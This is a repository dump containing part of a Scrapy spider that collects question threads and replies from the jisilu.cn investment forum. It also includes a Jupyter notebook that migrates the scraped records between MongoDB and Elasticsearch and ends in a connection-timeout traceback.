101 |         #     content = None
102 | 
103 | 
104 |         content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]')
105 | 
106 |         content_html = content_node.extract_first() # 获取到源码
107 | 
108 |         # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
109 |         # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
110 |         # try:
111 |         #     content = ret[0].strip()
112 |         # except Exception as e:
113 |         #     # logging.error(e)
114 |         #     content = None
115 | 
116 |         content_list = content_node.xpath('string(.)').extract()
117 |         content_str = self.compose_content(content_list)
118 | 
119 | 
120 | 
121 |         createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
122 |         if createTime is None:
123 |             return
124 | 
125 |         resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
126 | 
127 |         url = response.url
128 | 
129 |         # 添加发起人
130 |         try:
131 |             item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
132 |         except Exception as e:
133 |             print(e)
134 |             item['creator'] = None
135 | 
136 | 
137 |         try:
138 |             title = title.strip()
139 |         except Exception as e:
140 |             title = None
141 | 
142 |         item['content'] = content_str
143 | 
144 |         item['content_html'] = content_html
145 | 
146 |         try:
147 |             item['resp_no'] = int(resp_no)
148 |         except Exception as e:
149 |             # logging.warning(e)
150 |             # logging.warning('没有回复')
151 |             item['resp_no'] = 0
152 | 
153 |         item['title'] = title
154 |         item['question_id'] = question_id
155 | 
156 |         createTime = createTime.strip()
157 | 
158 |         if not re.search('^\d', createTime):
159 |             createTime = createTime.replace('发表时间 ', '')
160 |             # createTime = None
161 |             # self.logger.error('创建日期有误:{}'.format(url))
162 |         if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime):
163 |             self.logger.error('创建日期有误:{}'.format(url))
164 |             self.logger.error(createTime)
165 |             createTime = None
166 |         #
167 |         item['createTime'] = createTime
168 |         item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','')
169 | 
170 |         resp = []
171 |         last_resp_date = None
172 |         for index, reply in enumerate(
173 |                 response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
174 |             replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
175 | 
176 |             if last_resp_date is None:
177 |                 last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first()
178 | 
179 |             rep_content = reply.xpath(
180 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
181 |             # print rep_content
182 |             agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
183 |             try:
184 |                 int(agree)
185 |             except:
186 |                 agree = 0
187 | 
188 |             resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]})
189 |         # item['html'] = response.text
190 |         item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
191 | 
192 |         item['resp'] = resp
193 |         item['last_resp_date'] = last_resp_date
194 |         item['only_add'] = True
195 |         yield item
196 | 
197 |     def check_detail(self, response):
198 | 
199 |         if '您访问的资源需要购买会员' in response.text:
200 |             return
201 | 
202 |         question_id = response.meta['question_id']
203 |         more_page = response.xpath('//div[@class="pagination pull-right"]')
204 | 
205 |         item = JslItem()
206 |         last_resp_date = None # 后期更新
207 | 
208 |         item['last_resp_date'] = last_resp_date
209 |         title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first()
210 |         s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first()
211 |         ret = re.findall('(.*?)\.donate_user_avatar', s, re.S)
212 |         item['question_id'] = question_id
213 | 
214 |         try:
215 |             content = ret[0].strip()
216 |         except Exception as e:
217 |             logging.error(e)
218 |             content = None
219 | 
220 |         createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first()
221 |         # 'aw-question-detail-meta'
222 |         resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+')
223 | 
224 |         url = response.url
225 | 
226 |         # 添加发起人
227 |         try:
228 |             item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first()
229 |         except Exception as e:
230 |             logging.error(e)
231 |             item['creator'] = None
232 | 
233 |         item['title'] = title.strip()
234 |         item['content'] = content
235 |         try:
236 |             item['resp_no'] = int(resp_no)
237 |         except Exception as e:
238 |             # logging.warning('没有回复')
239 |             item['resp_no'] = 0
240 | 
241 |         item['createTime'] = createTime.replace('发表时间 ', '')
242 |         item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
243 |         item['url'] = url.strip()
244 |         # item['html'] = response.text
245 |         item['last_resp_date'] = response.meta['last_resp_date']
246 | 
247 |         # 多页
248 |         if more_page:
249 | 
250 |             total_resp_no = item['resp_no']
251 |             total_page = total_resp_no // 100 + 1
252 |             item['resp'] = []
253 | 
254 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers,
255 |                           callback=self.multi_page_detail,
256 |                           meta={'question_id': question_id, 'page': 1, 'total_page': total_page,
257 |                                 'item': item})
258 | 
259 |         else:
260 | 
261 |             resp_ = []
262 |             # 回复内容
263 |             for index, reply in enumerate(
264 |                     response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
265 |                 replay_user = reply.xpath(
266 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
267 |                 rep_content = reply.xpath(
268 |                     './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
269 |                     'string(.)').extract_first()
270 |                 # rep_content = '\n'.join(rep_content)
271 | 
272 |                 agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
273 |                 if agree is None:
274 |                     agree = 0
275 |                 else:
276 |                     agree = int(agree)
277 | 
278 |                 resp_.append(
279 |                     {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
280 | 
281 |             item['resp'] = resp_
282 | 
283 |             yield item
284 | 
285 |     # 详情页
286 |     def multi_page_detail(self, response):
287 | 
288 |         current_page = response.meta['page']
289 |         item = response.meta['item']
290 |         total_page = response.meta['total_page']
291 |         question_id = response.meta['question_id']
292 | 
293 |         resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div')
294 | 
295 |         for index, reply in enumerate(
296 |                 response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')):
297 |             replay_user = reply.xpath(
298 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first()
299 |             rep_content = reply.xpath(
300 |                 './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath(
301 |                 'string(.)').extract_first()
302 |             if rep_content:
303 |                 rep_content = rep_content.strip()
304 |             # rep_content = '\n'.join(rep_content)
305 | 
306 |             agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first()
307 |             if agree is None:
308 |                 agree = 0
309 |             else:
310 |                 agree = int(agree)
311 | 
312 |             item['resp'].append(
313 |                 {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}})
314 | 
315 |         current_page += 1
316 | 
317 |         if current_page <= total_page:
318 |             yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers,
319 |                           callback=self.multi_page_detail,
320 |                           meta={'question_id': question_id, 'page': current_page, 'total_page': total_page,
321 |                                 'item': item})
322 |         else:
323 |             yield item
324 | 


--------------------------------------------------------------------------------
/数据迁移.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "code",
  5 |    "execution_count": 30,
  6 |    "metadata": {},
  7 |    "outputs": [],
  8 |    "source": [
  9 |     "import pymongo\n",
 10 |     "from elasticsearch import Elasticsearch"
 11 |    ]
 12 |   },
 13 |   {
 14 |    "cell_type": "code",
 15 |    "execution_count": 31,
 16 |    "metadata": {},
 17 |    "outputs": [],
 18 |    "source": [
 19 |     "db = pymongo.MongoClient('10.18.6.46',27001)"
 20 |    ]
 21 |   },
 22 |   {
 23 |    "cell_type": "code",
 24 |    "execution_count": 32,
 25 |    "metadata": {},
 26 |    "outputs": [],
 27 |    "source": [
 28 |     "es = Elasticsearch(['10.18.6.102:9200'])"
 29 |    ]
 30 |   },
 31 |   {
 32 |    "cell_type": "code",
 33 |    "execution_count": 11,
 34 |    "metadata": {},
 35 |    "outputs": [],
 36 |    "source": [
 37 |     "doc = db['db_parker']['jsl']"
 38 |    ]
 39 |   },
 40 |   {
 41 |    "cell_type": "code",
 42 |    "execution_count": 12,
 43 |    "metadata": {},
 44 |    "outputs": [],
 45 |    "source": [
 46 |     "item = doc.find_one()"
 47 |    ]
 48 |   },
 49 |   {
 50 |    "cell_type": "code",
 51 |    "execution_count": 13,
 52 |    "metadata": {
 53 |     "scrolled": true
 54 |    },
 55 |    "outputs": [
 56 |     {
 57 |      "data": {
 58 |       "text/plain": [
 59 |        "{'_id': ObjectId('5c249f29c4c05d4ba4bfa49d'),\n",
 60 |        " 'creator': 'greatbear',\n",
 61 |        " 'title': '各位研究技术指标有什么心得体会？',\n",
 62 |        " 'content': '各位研究技术指标多久了？研究这东西，能帮炒股赚钱么：）',\n",
 63 |        " 'resp_no': 11,\n",
 64 |        " 'createTime': '2018-12-14 08:38',\n",
 65 |        " 'crawlTime': '2019-03-16 09:54:43',\n",
 66 |        " 'url': 'https://www.jisilu.cn/question/297952',\n",
 67 |        " 'resp': [{'seeker24680_0': ['0', '可以说很多不明觉厉的词，适合用于忽悠别人，具体效果同风水先生。']},\n",
 68 |        "  {'joyfulli_1': ['0',\n",
 69 |        "    '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析，然后进行预测\\n说白了就是统计学\\n所以，学过统计学就知道技术分析怎么用了']},\n",
 70 |        "  {'老高0813_2': ['0', '基本没卵用']},\n",
 71 |        "  {'z383788052_3': ['0', '从来只看指标，只看k']},\n",
 72 |        "  {'花园小琴_4': ['0', '看图形，一般只看低买高卖，但事后后悔，赚少了']},\n",
 73 |        "  {'风险搬运工_5': ['0', '趋势（多和空）和震荡结合得做（同时做），不做单边、所谓轮动策略。\\n倾向于胜率低，赔率高的策略。']},\n",
 74 |        "  {'smag_6': ['0', '基本不看指标，静下心感受波动，在波动中下注。。。']},\n",
 75 |        "  {'海浪头头_7': ['0', '同意美棠子的看法']},\n",
 76 |        "  {'jsl0900_8': ['0', '从技术指标上看，我可以预测所有交易标的的后续走势，至于准确不准确，那不是我关心的问题']},\n",
 77 |        "  {'美棠子_9': ['4', '只是个辅助工具，基本面是核心，切不可颠倒主次。']},\n",
 78 |        "  {'蔓越橘_10': ['0', '用于T一下可以，其他就算了吧。']}],\n",
 79 |        " 'last_resp_date': '2018-12-14 10:14'}"
 80 |       ]
 81 |      },
 82 |      "execution_count": 13,
 83 |      "metadata": {},
 84 |      "output_type": "execute_result"
 85 |     }
 86 |    ],
 87 |    "source": [
 88 |     "item"
 89 |    ]
 90 |   },
 91 |   {
 92 |    "cell_type": "code",
 93 |    "execution_count": 14,
 94 |    "metadata": {},
 95 |    "outputs": [],
 96 |    "source": [
 97 |     "keys= item.keys()"
 98 |    ]
 99 |   },
100 |   {
101 |    "cell_type": "code",
102 |    "execution_count": 15,
103 |    "metadata": {},
104 |    "outputs": [
105 |     {
106 |      "data": {
107 |       "text/plain": [
108 |        "dict_keys(['_id', 'creator', 'title', 'content', 'resp_no', 'createTime', 'crawlTime', 'url', 'resp', 'last_resp_date'])"
109 |       ]
110 |      },
111 |      "execution_count": 15,
112 |      "metadata": {},
113 |      "output_type": "execute_result"
114 |     }
115 |    ],
116 |    "source": [
117 |     "keys"
118 |    ]
119 |   },
120 |   {
121 |    "cell_type": "code",
122 |    "execution_count": 34,
123 |    "metadata": {},
124 |    "outputs": [],
125 |    "source": [
126 |     "save_db = db['db_parker']['jsl_note']"
127 |    ]
128 |   },
129 |   {
130 |    "cell_type": "code",
131 |    "execution_count": 24,
132 |    "metadata": {},
133 |    "outputs": [],
134 |    "source": [
135 |     "import datetime"
136 |    ]
137 |   },
138 |   {
139 |    "cell_type": "code",
140 |    "execution_count": 37,
141 |    "metadata": {
142 |     "scrolled": true
143 |    },
144 |    "outputs": [
145 |     {
146 |      "ename": "AutoReconnect",
147 |      "evalue": "10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应，连接尝试失败。",
148 |      "output_type": "error",
149 |      "traceback": [
150 |       "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
151 |       "\u001b[1;31mTimeoutError\u001b[0m                              Traceback (most recent call last)",
152 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m    609\u001b[0m             return receive_message(self.sock, request_id,\n\u001b[1;32m--> 610\u001b[1;33m                                    self.max_message_size)\n\u001b[0m\u001b[0;32m    611\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
153 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(sock, request_id, max_message_size)\u001b[0m\n\u001b[0;32m    172\u001b[0m     length, _, response_to, op_code = _UNPACK_HEADER(\n\u001b[1;32m--> 173\u001b[1;33m         _receive_data_on_socket(sock, 16))\n\u001b[0m\u001b[0;32m    174\u001b[0m     \u001b[1;31m# No request_id for exhaust cursor \"getMore\".\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
154 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\network.py\u001b[0m in \u001b[0;36m_receive_data_on_socket\u001b[1;34m(sock, length)\u001b[0m\n\u001b[0;32m    231\u001b[0m             \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 232\u001b[1;33m                 \u001b[0mchunk_length\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mrecv_into\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmv\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mbytes_read\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    233\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[1;33m(\u001b[0m\u001b[0mIOError\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mOSError\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
155 |       "\u001b[1;31mTimeoutError\u001b[0m: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应，连接尝试失败。",
156 |       "\nDuring handling of the above exception, another exception occurred:\n",
157 |       "\u001b[1;31mAutoReconnect\u001b[0m                             Traceback (most recent call last)",
158 |       "\u001b[1;32m<ipython-input-37-2f3f08ea67f7>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m()\u001b[0m\n\u001b[0;32m      1\u001b[0m \u001b[0murl_set\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mset\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[1;32mfor\u001b[0m \u001b[0mitem\u001b[0m \u001b[1;32min\u001b[0m \u001b[0mdoc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mfind\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      3\u001b[0m     \u001b[0mcreator\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'creator'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      4\u001b[0m     \u001b[0mtitle\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'title'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m      5\u001b[0m     \u001b[0mcontent\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'content'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
159 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36mnext\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1187\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__empty\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1188\u001b[0m             \u001b[1;32mraise\u001b[0m \u001b[0mStopIteration\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1189\u001b[1;33m         \u001b[1;32mif\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_refresh\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1190\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__manipulate\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1191\u001b[0m                 \u001b[0m_db\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
160 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m_refresh\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m   1124\u001b[0m                                         \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclient\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1125\u001b[0m                                         self.__max_await_time_ms)\n\u001b[1;32m-> 1126\u001b[1;33m                 \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__send_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1127\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1128\u001b[0m         \u001b[1;32mreturn\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
161 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m__send_message\u001b[1;34m(self, operation)\u001b[0m\n\u001b[0;32m    929\u001b[0m             \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    930\u001b[0m                 response = client._send_message_with_response(\n\u001b[1;32m--> 931\u001b[1;33m                     operation, exhaust=self.__exhaust, address=self.__address)\n\u001b[0m\u001b[0;32m    932\u001b[0m                 \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__address\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mresponse\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    933\u001b[0m                 \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__exhaust\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
162 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_send_message_with_response\u001b[1;34m(self, operation, exhaust, address)\u001b[0m\n\u001b[0;32m   1143\u001b[0m             \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__all_credentials\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1144\u001b[0m             \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_event_listeners\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1145\u001b[1;33m             exhaust)\n\u001b[0m\u001b[0;32m   1146\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1147\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m_reset_on_error\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mserver\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
163 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_reset_on_error\u001b[1;34m(self, server, func, *args, **kwargs)\u001b[0m\n\u001b[0;32m   1154\u001b[0m         \"\"\"\n\u001b[0;32m   1155\u001b[0m         \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1156\u001b[1;33m             \u001b[1;32mreturn\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1157\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1158\u001b[0m             \u001b[1;31m# The socket has been closed. Don't reset the server.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
164 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\server.py\u001b[0m in \u001b[0;36msend_message_with_response\u001b[1;34m(self, operation, set_slave_okay, all_credentials, listeners, exhaust)\u001b[0m\n\u001b[0;32m    104\u001b[0m             \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    105\u001b[0m                 \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msend_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mdata\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmax_doc_size\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 106\u001b[1;33m                 \u001b[0mreply\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mreceive_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mrequest_id\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    107\u001b[0m             \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    108\u001b[0m                 \u001b[1;32mif\u001b[0m \u001b[0mpublish\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
165 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m    610\u001b[0m                                    self.max_message_size)\n\u001b[0;32m    611\u001b[0m         \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 612\u001b[1;33m             \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    613\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    614\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m_raise_if_not_writable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0munacknowledged\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
166 |       "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(self, error)\u001b[0m\n\u001b[0;32m    741\u001b[0m         \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    742\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 743\u001b[1;33m             \u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    744\u001b[0m         \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    745\u001b[0m             \u001b[1;32mraise\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
